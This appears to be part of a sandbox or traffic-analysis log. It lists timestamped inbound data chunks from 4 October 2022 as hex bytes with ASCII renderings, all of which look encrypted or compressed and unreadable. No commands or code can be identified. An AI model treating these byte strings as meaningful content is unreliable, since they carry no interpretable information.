                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18904INData Raw: 23 a5 bd 06 87 68 61 64 d9 8a 80 88 19 86 c1 77 72 50 88 ba cf 74 d2 9b 10 92 b2 10 5f 00 fc aa d2 37 57 24 f2 76 9b 9e 03 67 c8 9d 4e 77 51 a2 25 7f 73 43 74 ff ab b4 99 05 db d5 a1 63 27 b3 d8 4d 25 09 49 31 4f 8b d5 6b c3 9c 0c 02 61 86 fd 03 7f b8 59 4a 0f 9b 1e ec 07 b3 4a 88 74 45 c0 e4 07 f7 92 b3 1f 78 f7 14 3d 04 03 df 40 f0 b9 e7 23 1f 2b 5f 8b a2 b6 df 65 6f d9 b0 5a f8 85 2c 9b 20 df f8 6d 1c ad ba fd 59 b8 b3 c0 51 96 5e 62 64 86 6e c1 a8 41 0d 77 28 5a 52 c8 a2 72 e5 e8 22 4e 80 20 7e eb f8 7b d2 ce 13 03 35 ca b8 c8 26 eb 6b 6d 71 39 41 c9 fd 64 b0 e3 3d 9e 82 69 76 85 03 02 c2 ca 21 f1 e5 db c1 a7 af 85 5d f7 b3 bc ea 5d b0 5b b7 9d 6b 1f e0 71 8f 7d ef 18 fe fa 3e 5b a2 b7 fb f6 6f d0 87 de 87 56 ce c0 ac f8 d1 0b 5b f6 4e e3 26 bd 97 7b
                                                                                                                                                                                                                                    Data Ascii: #hadwrPt_7W$vgNwQ%sCtc'M%I1OkaYJJtEx=@#+_eoZ, mYQ^bdnAw(ZRr"N ~{5&kmq9Ad=iv!]][kq}>[oV[N&{
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18920INData Raw: 7d e5 e1 51 f4 5f 3a 8e b0 94 39 66 8d e7 d6 98 b7 ad c8 ba 65 be 87 fb 83 9a d5 64 9c ce a1 d9 47 56 3a b8 ba cd 9c 75 6e 69 fd d1 f2 ea 8e cf b2 bb 95 cb b7 7e 04 ad 07 20 70 79 03 4f 46 68 9e bf a0 1a da 5c 30 90 f0 86 64 f8 bc 62 a1 91 5c 2d 7c 50 32 68 11 14 61 6b 9b 34 08 95 0e b4 1d ef 9b b3 1a e4 75 35 78 c7 9f 4a 30 79 f6 7d f3 7a ec 96 e5 ab 38 52 ed 87 de d0 e3 02 bf 20 38 f0 e8 61 31 0e 44 2f 4d 5b 23 26 32 9a c8 a8 81 fc f5 af 6a bb cd 1c 34 da 4c a5 c4 f9 71 28 6e e2 86 f7 9e 54 3a e4 81 1d ab a8 2e d9 f0 38 75 72 a0 ab 05 43 96 3e a8 d4 82 87 93 8a 40 72 b0 b7 06 66 dc 75 4f 89 79 5c 05 48 bd 5d 68 ce f4 9f 1a 8b 6c c2 fd 3c 3a ac 06 e7 3d 48 2f e9 74 55 b3 5c ab d4 4f fb 68 95 f0 73 a5 9a a0 81 f8 1f 9c f4 04 d6 cc bb 90 b4 15 76 c1 b5 54
                                                                                                                                                                                                                                    Data Ascii: }Q_:9fedGV:uni~ pyOFh\0db\-|P2hak4u5xJ0y}z8R 8a1D/M[#&2j4Lq(nT:.8urC>@rfuOy\H]hl<:=H/tU\OhsvT
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18936INData Raw: 8b 71 14 bb 28 09 de a6 92 ef 53 a6 e6 09 f7 44 df ba 1a 9c ff 9f 7d b2 c9 cc 84 71 01 fc 0c 22 88 22 71 02 c3 0c 7b e3 85 20 62 92 79 07 ff f7 7a 61 10 fd b7 3a 1f 74 42 41 b6 de 93 f6 8b 1c 34 7f 8f 2a a5 2f a6 54 90 35 3b 5b 3c 3a 6f bf 7c cd 96 3d 50 da da ff 2a 8d e8 ac b0 b5 a9 2b 71 e8 9c ca 61 5b a8 ad 4b 62 a3 ee be 20 24 ed e5 fb 9c 04 07 de e6 8f b7 78 ba d6 18 4a e0 5a 33 d3 3c b3 e4 73 f5 a4 da 09 5f b4 79 05 f7 fb 76 bd eb 32 08 70 2a c0 96 5f ec 73 d4 e3 20 29 02 13 1e ef f7 98 a0 7b 58 8e 47 8d 88 34 d7 72 f9 31 8e 71 c6 59 85 bc 2a 8e c3 9b 56 9b a1 4e fa 93 ec 12 bd cc e7 d2 91 7c d7 bf 20 b3 8d 94 46 62 be 5a d9 3c 8d 6c 90 ab 6f 07 46 bb 24 79 23 55 96 9e 61 fd 02 2c 9f 4f 77 33 70 e1 79 6a 2d 9a 87 5c 26 e8 6a 92 11 64 72 92 e0 6f e2
                                                                                                                                                                                                                                    Data Ascii: q(SD}q""q{ byza:tBA4*/T5;[<:o|=P*+qa[Kb $xJZ3<s_yv2p*_s ){XG4r1qY*VN| FbZ<loF$y#Ua,Ow3pyj-\&jdro
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18952INData Raw: 4f ff 63 00 32 8e c3 c2 90 8d f7 f4 cd 6b 22 e4 ef ba 75 67 d2 b4 2a b0 22 2a d8 23 aa 56 d0 3d 3c ab fa e5 cb 69 41 06 94 c8 8b 07 60 69 1c a0 31 07 85 82 c4 27 af 5e d3 49 56 23 4b c7 80 89 c7 e7 3e f0 65 7e 80 43 0e a9 34 11 14 b6 52 60 2d 91 35 c4 c0 8f 2a 98 bb 9d 8f bf 98 7a 8e 33 a4 74 ea 92 85 88 3a 2c 58 cf 17 a3 4a 69 01 91 8b 33 16 97 9f 86 f6 f3 7c 8d 90 ce c8 0b 34 11 8a 31 9a d9 83 48 65 60 f5 65 1c 2d 59 8c 1b 98 00 40 12 7d 33 02 80 51 92 e3 64 07 0e 14 b1 41 07 68 ef 45 fc 9b a1 1c 2d 66 04 ce 9f ac 8f 10 44 87 39 61 db b8 c2 90 7c e9 88 55 29 d2 a6 26 73 73 22 2f 32 15 4c 32 de 1e 3c 21 9c 11 31 ee 26 f6 82 31 c2 ee 28 ff bc 83 c0 a8 dd 02 b2 81 5d e8 6a c1 09 04 36 03 b2 51 7f 8c 16 dd 6f 0f 46 fe 42 ce 06 02 70 c7 a6 a1 e5 43 eb 6c 64
                                                                                                                                                                                                                                    Data Ascii: Oc2k"ug*"*#V=<iA`i1'^IV#K>e~C4R`-5*z3t:,XJi3|41He`e-Y@}3QdAhE-fD9a|U)&ss"/2L2<!1&1(]j6QoFBpCld
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18968INData Raw: 6f d0 e4 82 12 76 35 63 21 90 c4 cb 15 f3 b1 ab f0 bb d8 55 94 ff 4e 17 f4 1b f0 de fb d0 64 69 ad c3 75 46 b9 85 0c 47 4f 3e 59 e6 9a 45 ef fd 3d 01 85 5b fc c6 94 6b 72 f1 11 5c 6b a4 bf 22 25 de 70 ab 03 80 8d 10 52 81 00 88 7a d6 09 a2 1e 35 b1 96 6c 2e 0f 95 82 6a 55 03 dc be e8 77 7b e3 e9 d2 c7 7e b4 b8 e8 fa 75 80 2f 2a 09 0e 32 52 57 61 5b 69 e4 49 fb dd 00 22 5a 07 b3 79 8f a7 a8 30 ce 52 65 83 20 ef c9 c5 aa 33 c5 0d e6 87 0e a2 a1 10 aa 61 02 45 39 80 2a fa 9c 62 d8 ed c5 19 74 91 c4 00 a8 b3 d0 a3 21 cf a3 81 30 72 d6 b0 d8 7b 88 fc 11 97 53 38 4f fc e7 f4 ef 4d 8c b1 d4 03 12 82 b2 40 0a 4f 6a da 44 38 9c bd 79 69 ca af 43 84 9a 1d 96 5a 22 ce a8 49 6d bd 74 bb c6 4b 5a 5d c0 93 ec 3e e6 47 2a bd 90 14 bf 7c 69 3e 85 b0 59 59 bb 5a 92 4a 04
                                                                                                                                                                                                                                    Data Ascii: ov5c!UNdiuFGO>YE=[kr\k"%pRz5l.jUw{~u/*2RWa[iI"Zy0Re 3aE9*bt!0r{S8OM@OjD8yiCZ"ImtKZ]>G*|i>YYZJ
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC18984INData Raw: d7 ef 57 98 56 c8 22 c4 66 ce 88 3f 84 e3 dd 01 a1 14 2c 3f 20 9d 96 03 f9 82 ba e0 df df 91 6b 61 3e fe 7e 32 bd bd ed 08 d6 73 35 e7 61 d3 04 4a b9 d1 ba 77 08 25 1a 24 be 63 90 9b c0 8b 77 d6 61 39 5e 86 61 48 6a 47 ad 3c cb a7 0b 62 69 ab b2 76 af 23 b9 8c 01 a4 44 53 f3 52 30 dd 4e 3b f4 67 21 b5 8b de a2 15 45 31 f1 cc e1 f7 0b c2 79 d5 39 a8 b4 2c ef 64 f4 f1 0d 81 d8 f6 02 d0 5f 9c 1d 78 bb 9f c8 73 4b c8 f0 83 1a b8 0c 03 70 36 9b 51 a0 3c 96 28 cb b3 8b 89 3a d8 05 e6 91 35 be 59 5d 10 f2 45 02 0c 18 1a aa 00 6d 9d 2f 47 52 ae 18 6d b5 87 54 3a 66 8f 87 2d 51 e9 bc d9 a6 33 27 21 73 23 a0 e9 d3 e2 3c 06 a5 6b 83 3b cf 56 ac 5e b6 5e f2 5d be 2c d9 f6 6b 88 ef de d0 f3 68 84 7f 3b b9 89 ca 56 b9 3f d1 50 b3 1e 40 66 65 7c a8 f1 3f 9d b4 d1 4d 44
                                                                                                                                                                                                                                    Data Ascii: WV"f?,? ka>~2s5aJw%$cwa9^aHjG<biv#DSR0N;g!E1y9,d_xsKp6Q<(:5Y]Em/GRmT:f-Q3'!s#<k;V^^],kh;V?P@fe|?MD
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19000INData Raw: ba 82 5d f1 d6 ef ff 6f 9e af 0e 33 08 9b fc 81 0d 42 17 fc 41 11 5d ca 43 7e 60 93 f2 7b 86 d8 90 40 a9 4e fe 69 5c 3d ec 75 71 cc 4e 09 92 c7 39 82 6e d6 fd 00 1f ed 17 a7 a1 ee bd 0c 2c f7 05 71 45 41 c4 4c 2b 26 f4 07 40 5d e6 37 8e 28 65 09 6a aa ea e4 3e 9e 60 5d d7 c7 7e 11 8c f3 75 fb 61 68 8d b2 44 5e 00 6d 9b 8e 80 97 59 63 d8 53 69 2b c3 0b d4 bb 28 69 21 bb 43 a3 a8 9f 48 f2 d6 61 e0 03 8b 1a 24 0e 32 8d 04 d9 8b c5 74 db 27 e2 2f 71 48 b5 8c 6d 8b c8 7a ff 8b 2a 1b 53 5f 21 67 c1 ea 98 95 ae 94 3d f5 1d 51 05 7a d3 ec d7 1b 55 87 f2 c5 7d 5f ca a2 ed 50 0b 75 aa a9 70 ac cd 7f c3 f7 73 30 88 b7 ef 1e fd a7 07 3b b4 d3 09 d5 f8 de 81 8f cc ff 9e fc e8 9a 99 fd 30 34 c7 45 68 4d a7 4b e0 94 a9 34 be 62 fa 97 6e e8 14 8f e5 10 09 49 bd 65 e6 60
                                                                                                                                                                                                                                    Data Ascii: ]o3BA]C~`{@Ni\=uqN9n,qEAL+&@]7(ej>`]~uahD^mYcSi+(i!CHa$2t'/qHmz*S_!g=QzU}_Pups0;04EhMK4bnIe`
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19016INData Raw: 2f 26 21 6f 16 29 ab d0 cf 83 85 79 8f 1c 1b f4 f4 03 b0 e1 c0 e7 0f b9 07 97 a3 9f e2 9e 25 b8 53 5a 74 2b f8 d9 4c df 51 7c bb b2 f8 df 0e 43 5d 01 c8 8a 46 7b af 52 1f d3 16 ef bc fe dd 78 3f 13 a8 9c 2c fd 2f 90 79 37 09 a1 07 c4 2a 2b 20 c0 f2 fa 2e 7e ca 98 1d 20 88 31 45 8d 03 25 ec 9f b0 0b 6c 4d 0a c5 05 7c f8 5d eb 31 a2 67 5b ae 33 b0 29 83 31 88 39 04 54 06 cb 69 50 72 24 34 17 e0 5c 3c 51 43 70 67 f9 dd 27 dd 6b 7c e7 9a eb 85 ff 91 f7 7a 0c 5a ef d5 40 9f 06 8d 8c 19 f3 d4 79 a9 cc c7 cd 2c 66 80 b5 e4 84 2f e1 07 d7 79 2b 1a 9a 15 1e 36 4d e5 c1 90 77 55 9f 03 9b ce e3 7e a5 a0 81 53 4f 4b 4d 6e d3 ac 27 a3 37 97 b6 c7 54 7f a5 9c 27 89 48 b6 37 95 28 08 f8 5f 3c be 71 75 34 05 7d cd e9 b0 07 3e 9d 3d 40 64 50 61 81 7e 78 15 b9 79 b2 24 e2
                                                                                                                                                                                                                                    Data Ascii: /&!o)y%SZt+LQ|C]F{Rx?,/y7*+ .~ 1E%lM|]1g[3)19TiPr$4\<QCpg'k|zZ@y,f/y+6MwU~SOKMn'7T'H7(_<qu4}>=@dPa~xy$
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19032INData Raw: da 29 30 1e c3 4e 79 68 c3 b3 ab 96 cd af 7a 53 9f 2c dd 02 a0 ad c1 9a 86 22 48 a4 31 61 65 d7 93 52 e1 63 2a 18 83 8b 1a f9 45 0a 91 0a 17 8a 7a ce c3 44 5b b0 11 e7 75 05 51 13 71 16 79 0b e5 3b 62 7c fb d8 0a 4c b3 d2 ff 79 ec 7f 61 55 66 8c 0d fd 50 58 f9 c2 49 f2 f5 99 5b 17 f2 2b 56 ee 4a 22 0d 1d d6 22 0e f8 10 e8 ad 96 f4 a5 0a 31 0a 87 a9 88 55 d2 e6 e5 66 d9 92 e4 60 29 67 55 1b 9a e5 7a 1b a0 d7 a5 9c 3f 70 2d 24 9e 3a b7 3b cd 4d 3f 0f a4 67 07 23 89 21 87 82 f5 b5 2d ad ff 5e d9 33 2b db 14 7b f9 5b 38 c0 98 4e 10 26 bc 59 d2 62 ce cf f6 cc e0 fe ff 18 8b 47 a7 40 01 4b 2e f3 19 0d b1 23 81 eb 16 f1 d2 ae 6c 29 fd c9 34 f3 94 49 16 b3 e0 c8 ba 9a 32 0f b7 4c dc e6 ec d3 94 c6 58 b8 68 cd 0c 7f bf 00 47 e4 8a bf 2e 0b c4 fc f9 c8 43 78 4a f1
                                                                                                                                                                                                                                    Data Ascii: )0NyhzS,"H1aeRc*EzD[uQqy;b|LyaUfPXI[+VJ""1Uf`)gUz?p-$:;M?g#!-^3+{[8N&YbG@K.#l)4I2LXhG.CxJ
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19048INData Raw: 3e e7 ff 5f 2d ae 1b 5a 20 68 29 cf 41 9d 26 54 f1 11 25 b8 05 05 a0 4b 20 b5 6f b5 be 44 14 4c f8 85 e1 9b 46 8b 01 9e 3f 3d 15 61 09 17 3f b3 2a e9 71 7b 14 f8 2f 26 3a 56 b9 ec 88 e0 2d 58 78 1d e7 c0 e9 52 11 14 06 b1 df 54 12 48 db 1d ba 29 1f 94 99 7a f3 6c a9 7d a4 a5 20 a8 a6 29 6e b6 88 6e 80 fb f6 7b 03 6d 6d 4e 33 87 0f 83 13 98 95 bd ec 65 7e db 1b 5f 8f 96 6a 82 08 81 c1 02 0f 13 f0 a9 9e da 99 27 50 a4 b3 56 0f 93 bf ca b7 cf a1 b6 d4 a2 49 0b 60 07 e5 b7 d2 6c 89 2c b3 2f c9 65 ac 4e 3c 92 3c 7f b3 db 75 28 b7 2e 3d 5e 53 56 1f 7e 0b ab 03 a3 23 d9 b4 81 c3 46 30 9e 69 1e 62 66 80 95 e4 1b 4f db 60 5f 6f b7 5b a2 6d 45 9e ef a3 b7 ba d7 9a 35 9d d9 ac 67 4e 49 cc b6 8c 2e 0c 3d 4c 01 de f0 95 6f 89 3e 82 ee a8 ad de 36 aa fe d6 90 71 78 0f
                                                                                                                                                                                                                                    Data Ascii: >_-Z h)A&T%K oDLF?=a?*q{/&:V-XxRTH)zl} )nn{mmN3e~_j'PVI`l,/eN<<u(.=^SV~#F0ibfO`_o[mE5gNI.=Lo>6qx
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19064INData Raw: 2d f8 25 5b f0 40 6d 4b 8f a4 d2 b9 f4 ad da f5 60 a7 4f 0d f3 b1 67 d3 6f 06 aa 20 f2 51 b5 0f 6b d7 10 d9 82 04 48 b7 93 a7 0f cf 3f 78 02 e9 4b 08 d9 7a 21 f2 01 2a 7c c3 30 5c 78 49 ea e7 af 15 b2 89 a6 15 a8 18 88 14 a4 6f 44 42 fb d1 bd 9a 91 d7 55 0a a7 4b ed f0 a8 9f a1 28 c1 1d 18 63 33 a6 a5 47 a8 d4 b8 22 35 a5 b2 77 de 87 5d 81 2e b0 6f 49 dc 7d 33 73 14 77 dd 7d 3d 06 18 c3 4b 64 b9 f1 c0 57 54 1f c5 b2 7d b7 ca b3 b7 64 fd c3 71 88 47 6b 38 d9 a3 a6 02 3d f7 c1 4d 38 9b a9 ec 46 a7 eb b5 39 9d 33 bc b4 4a 43 2c a5 ef 7f ad cf 56 89 16 9c 31 ba d3 12 8d cf c6 0c 69 48 21 8c f0 f8 e8 67 89 f2 09 3e 69 15 a9 6d ab 07 75 c7 f2 6c fd f2 9c 77 66 cc d4 f6 28 cc e4 b3 2b 3d a3 fa 15 13 09 4f d1 5f c3 8c 10 1e 61 ce 27 8b b9 ff 24 a7 89 42 45 1b cb
                                                                                                                                                                                                                                    Data Ascii: -%[@mK`Ogo QkH?xKz!*|0\xIoDBUK(c3G"5w].oI}3sw}=KdWT}dqGk8=M8F93JC,V1iH!g>imulwf(+=O_a'$BE
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19080INData Raw: e2 fc 59 1a 1f 72 0a af db 43 c7 c2 4c 61 e7 9d c0 3e 7c 27 59 3a c5 dc 9f 85 af 11 9d e9 82 7f b0 64 b1 7e 27 3b fd bc 64 52 95 19 4a 5b 9f ec c3 7a b5 ca 1d fa 12 e7 b6 5c 2f 4c f6 12 21 46 28 e4 e6 7a 13 b0 de 19 0d d5 4f 73 49 82 90 0e 33 24 1a 97 bd e7 a4 9f 1f 2c 69 e9 fc 42 bf d6 3c ff f2 43 86 e7 17 c7 d6 05 c5 3d 39 cb f4 89 95 b2 2a 7d d4 15 bb 65 bb 45 23 40 5b 1a 8e a7 b2 7d 59 b9 70 93 e4 39 23 f4 9a 6f 7d a1 e2 88 a1 24 9b fb 39 8b 26 26 bc 02 90 de 81 3c a5 ae 13 ff a6 21 f7 8d 5c 2b 09 72 69 0b 32 04 4e c8 a1 07 db 72 3d eb 6d 55 b1 bf 3b 60 e4 28 c8 6f 53 5c f6 36 19 d9 cf 0a b3 95 28 d7 8e a0 06 73 35 2f f9 31 76 cd 0d 4e b3 5f 73 c1 44 48 fc d7 a5 08 66 04 2c bd 3d 7b a6 c2 af 4d ad f6 69 45 20 33 f9 ba ff 02 28 b0 55 c9 3a 96 87 22 9e
                                                                                                                                                                                                                                    Data Ascii: YrCLa>|'Y:d~';dRJ[z\/L!F(zOsI3$,iB<C=9*}eE#@[}Yp9#o}$9&&<!\+ri2Nr=mU;`(oS\6(s5/1vN_sDHf,={MiE 3(U:"
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19096INData Raw: ff 99 7f dd da d8 41 19 29 b9 a1 ca e0 5c 55 dd c9 30 df 12 4d 27 6e 9d 70 29 2a 89 2e 57 56 37 25 bc 51 6d 62 63 6d 1e 58 cb 99 b2 79 40 71 9f d0 ca 15 ad d8 f9 fb 28 a0 5e ef fb 53 e0 f3 63 21 25 9a b9 48 21 01 09 dd 68 06 d5 8f 1b 87 ff 9c 4d df 7d c2 a6 f4 87 5b 45 7a c1 67 37 3f de 26 dd 01 57 39 39 83 e8 d1 d4 97 5d cc 32 95 9d 6a 23 ba e6 ad 7d a0 a8 0e 63 eb 1c 83 f0 4f 1b b0 97 58 f5 2c 21 1a 86 82 68 52 2f bd 09 1a e8 4a 91 27 df df 78 42 86 77 41 06 79 be 5b 25 6f 48 95 e8 6e 78 61 8d 7b b8 9e b9 20 48 c5 d6 dd a5 1f 02 9d bf 2d 52 2c 25 55 24 2f 90 fd 2e 5f c2 d3 da b5 b3 39 4b 5f 71 39 aa 77 24 79 6e 14 a2 0b 6c 28 01 23 eb 00 29 1b 3f 9d d7 81 cd cc c3 b9 3c c1 9e 50 08 85 cc 93 09 33 1d 07 e3 34 b0 59 5e 06 ec 26 00 35 61 3d 5a 34 87 e6 82
                                                                                                                                                                                                                                    Data Ascii: A)\U0M'np)*.WV7%QmbcmXy@q(^Sc!%H!hM}[Ezg7?&W99]2j#}cOX,!hR/J'xBwAy[%oHnxa{ H-R,%U$/._9K_q9w$ynl(#)?<P34Y^&5a=Z4
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19112INData Raw: f4 fb 84 fc 6d b5 c7 b1 02 5f 51 c6 04 36 9b 66 49 78 24 00 eb 92 34 e8 9d b0 b9 00 8b d6 17 03 92 9b e6 9b 79 c3 8f a9 58 0e 5f 6d d9 1b cd 61 f4 e5 ec d5 c1 bc 0a c3 5e c0 89 c1 86 22 f6 18 d4 4e 32 f0 b0 83 4c c0 53 e5 b7 6b 30 c4 39 5f 64 bb 0b 3d 9c c9 5b a1 61 b5 fc f1 2a 47 dd 2f 51 9d 03 65 62 d4 25 8d 1e e7 aa 8f 23 9c 66 6d 37 a0 f1 00 a4 ff 38 14 b9 50 13 ce 67 e3 8b 87 e8 44 9f c0 89 e5 4d 39 6e 50 b5 7c db 19 4f 21 8f ee 89 f4 47 ba 02 12 b0 42 d9 fa d8 4a 55 43 ca 55 47 3b 34 f1 50 f3 07 5d b1 0c e8 db d2 9b ab 74 e6 9d 5c 0f 1e bd 04 d2 d7 d6 ab b4 f4 42 0c 24 e0 74 cd 6a 59 a4 49 7d be 00 f6 10 43 28 ae da 7d 98 de 4b de 2e 4d 31 5a 40 c7 98 0e 9c b6 68 a3 c2 eb a2 7f 60 ef e1 c0 93 05 08 80 ca 1b 37 a7 eb 71 f8 f9 69 c6 28 fd 4a 0a fb 87
                                                                                                                                                                                                                                    Data Ascii: m_Q6fIx$4yX_ma^"N2LSk09_d=[a*G/Qeb%#fm78PgDM9nP|O!GBJUCUG;4P]t\B$tjYI}C(}K.M1Z@h`7qi(J
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19128INData Raw: 01 8a 78 9c bf be 18 42 57 30 5c 6a b1 a0 05 c7 eb f9 03 62 31 37 07 be d2 93 66 04 cd c7 be 77 7a 27 19 12 33 46 59 b4 de f6 90 4f 95 e7 d5 04 50 2f 33 60 9d e9 05 f2 f1 f8 9a d8 cc 8e 4c 97 32 81 70 88 d6 99 6e c2 02 3a e6 fe 28 21 3e 3e c3 0a 1b d6 63 52 7d 4d 4c 43 87 c5 99 42 89 8e 9d 25 ae 38 87 28 41 c8 f2 69 80 bc 23 0b 82 4a c0 d3 75 85 1f ec eb b7 e4 05 b6 98 ce 88 b9 e3 4f 25 b2 4d c1 6a 30 8c 40 f5 52 61 38 9a ff 85 b7 09 13 c9 60 28 6d a1 78 41 f0 63 33 aa ce 18 49 69 fc 57 17 30 46 96 5c a4 94 f6 41 ef 76 cf 4d 5d 40 b3 b9 6b 58 6c 3b 10 55 2a 6d cf e1 0f 39 48 b6 f4 37 57 63 28 4f 64 7b 71 7e 34 8c ea 1d a6 17 71 e8 b6 ab 7c 87 e2 13 d7 9f e0 92 60 28 d1 56 78 68 d8 27 56 0c 06 7c c1 02 91 23 91 f8 ab 52 f1 9c eb 32 35 59 68 08 62 e1 33 fa
                                                                                                                                                                                                                                    Data Ascii: xBW0\jb17fwz'3FYOP/3`L2pn:(!>>cR}MLCB%8(Ai#JuO%Mj0@Ra8`(mxAc3IiW0F\AvM]@kXl;U*m9H7Wc(Od{q~4q|`(Vxh'V|#R25Yhb3
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19144INData Raw: d3 ff 83 5f b9 7d b3 1f c6 ab 35 93 89 79 fb f3 a4 b5 ec cc 5f 38 11 b5 3d a8 74 0d 7e b7 48 77 2c 08 4d 1c 9d 5b e0 05 f9 b4 c6 d8 ad b0 51 2d 0f 53 38 27 f2 da aa 6b 13 2a 21 ac 36 47 e1 dd 19 bf 9e 29 53 09 fe a9 56 36 5b 4e f8 e7 fb e6 f9 55 c7 43 21 80 72 20 0d c9 21 dd 3c b7 ce 63 45 18 b8 4e a3 48 17 3b 29 73 28 13 92 fc b1 13 9a a4 ee d3 c3 22 af ea 13 be b0 32 99 2c 12 4a a3 11 83 f7 cb 3f 35 d9 fc d5 bf 3d e8 f5 f1 0f 71 49 2b 53 f8 13 01 5d e2 a6 ee 1d 0b c9 4f 29 d0 72 8f e3 6b f6 54 64 cf a5 3f a2 7e f4 db af 26 a4 de 5c 78 2e 5e 21 1b 00 25 0a ef 24 2f 32 98 1f 09 d0 73 83 89 79 52 2b e8 a4 ea e8 d0 6a 03 29 c1 62 55 1e 7e 21 3e 63 5f fe 01 4a 1a b3 ff 4f eb e4 36 75 2b 26 0f 0a d1 17 89 cb 31 7e 2e b5 5f e9 fb 1c b9 88 5e 5e 36 6f 3c 88 a8
                                                                                                                                                                                                                                    Data Ascii: _}5y_8=t~Hw,M[Q-S8'k*!6G)SV6[NUC!r !<cENH;)s("2,J?5=qI+S]O)rkTd?~&\x.^!%$/2syR+j)bU~!>c_JO6u+&1~._^^6o<
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19160INData Raw: 70 7d 3c e3 01 e9 91 00 e9 e9 8c 9e d5 35 94 89 bc 89 36 65 d0 e7 b3 08 6e 98 64 d2 b4 be 6a 39 3a e0 ae 42 e3 9c 0e 96 12 d3 26 bc fd 3a fe 66 ab 15 1e 17 d8 fc 70 5d 42 c0 bd f1 a8 e7 2b 4c 94 9f c7 6e f2 0c 77 d6 7a f0 9a de f3 e7 9f 66 f3 78 8c 7b 08 b9 c4 0c ff e9 92 f9 a2 d3 cc 4a 77 50 2e 74 e3 03 b5 da 4b 1e 53 68 bf 40 e8 95 95 7f aa 5d 9b f7 06 0e 0a 47 7b 9d bf ec 46 2e a8 30 c2 26 a2 06 e9 14 bb a3 f4 b5 aa 84 77 1c 2e 5f 8b 24 da 69 bc c7 ae 3e f7 86 98 0d 40 46 8f 3e d7 0e 4c 26 13 d1 c5 40 4f 6d 54 6e 10 5c fb b5 b3 38 84 90 db d6 fb b4 25 21 76 ab 7e 2b 33 f4 94 bf 15 47 8d 87 a7 79 24 b6 b4 58 7a 09 5f 1d 09 58 94 10 9f 99 55 bc 40 24 ed 94 89 87 61 7d 5d ea 36 60 84 c6 43 9d 08 65 f0 e5 f8 5f d2 76 67 e7 23 69 d0 14 88 54 32 07 c9 51 0b
                                                                                                                                                                                                                                    Data Ascii: p}<56endj9:B&:fp]B+Lnwzfx{JwP.tKSh@]G{F.0&w._$i>@F>L&@OmTn\8%!v~+3Gy$Xz_XU@$a}]6`Ce_vg#iT2Q
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19176INData Raw: f2 b5 e3 0d 46 34 b6 52 c0 44 f4 b0 95 6a ab 73 33 6a 6b b1 73 72 42 1e 9f f2 a6 21 0f b8 30 5f d2 59 98 fb d8 a5 7c a5 07 ef 28 36 f3 96 6e bb 98 00 53 78 31 33 ae d6 3a 1b b5 df a5 95 29 84 ba e8 54 1d 19 5c 19 59 d4 85 98 ed e4 9b c2 99 f9 fa bb 4c dd 9b 7c f5 6e a5 fb 5f e8 17 f3 46 0f 4c b1 bc 91 a2 8d 83 49 00 ee db 9d 8a 38 a1 bf 92 80 a8 b4 5c f9 55 e3 bd 5b 58 93 18 50 8f 0d 18 38 9c 56 7f 4a 96 03 81 93 19 03 66 6d 7b e5 61 90 7f 4f cf f2 ce 52 45 c8 5f bc 83 db aa 8e ea 44 eb 16 53 62 19 f7 59 c4 84 92 b2 26 2c 64 d1 0e 6f 02 91 88 f7 dd 5b 7c b9 60 8f 0c 91 d6 e7 fd 44 5f fd c4 3e 3b 5c 65 76 d3 c1 81 0f cd c7 5f 2d c8 ad fc 7f a8 f8 7c 5e 7d 38 4e 18 15 86 ca 0a 14 10 3c d0 7c 0d d6 52 c4 46 93 c0 cc c2 7b 45 a7 a4 30 bb 6c 42 49 02 a1 41 5b
                                                                                                                                                                                                                                    Data Ascii: F4RDjs3jksrB!0_Y|(6nSx13:)T\YL|n_FLI8\U[XP8VJfm{aORE_DSbY&,do[|`D_>;\ev_-|^}8N<|RF{E0lBIA[
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC19192INData Raw: 7d dc f2 00 20 b3 5f 15 7f a5 eb b5 c4 3c 39 96 db 7a bd a9 e5 3e f6 58 cc f7 a7 35 01 d9 0b 99 bf 7d dd 27 f4 86 4e 1d 52 52 4c 39 a0 e7 7f 71 47 07 40 8e 58 90 65 d2 b6 d7 d8 12 4f 10 ef 22 4b e5 eb 5b b1 4d 56 fd d4 fb 70 b3 04 f4 eb 8f 5a 51 67 62 39 e8 35 0c ba db 54 bf 85 60 b2 b6 6f 2f 6e dc 98 cc 1d e6 7a 0b 67 e7 a6 7e 0c 3c 3a ed 54 a5 dd 5f a8 a3 83 59 5e bb 01 0a 08 b6 fe 65 5f ff 70 b0 fe b1 bf 2c a6 91 b4 44 86 7e b6 a4 38 eb f5 49 af 37 d8 b0 27 7e a9 e1 73 65 02 60 85 78 0e ab 6f 9a 16 8a 11 8e 72 52 9a 6f c0 47 ef 83 1a 19 6e ca e5 75 14 b5 3e 4a 18 71 ea e7 1d c2 21 3d b0 fe 75 4f 4d 34 d6 99 ff a1 93 f2 03 eb 85 fe 4d 7f 1b a6 3b 99 1e 15 85 ab f1 8d 31 14 c8 5e 34 be a4 ba 5b 82 84 e5 0f 09 ab 69 e6 10 6d a2 a5 f3 54 0e 11 e2 26 32 4d
                                                                                                                                                                                                                                    Data Ascii: } _<9z>X5}'NRRL9qG@XeO"K[MVpZQgb95T`o/nzg~<:T_Y^e_p,D~8I7'~se`xorRoGnu>Jq!=uOM4M;1^4[imT&2M
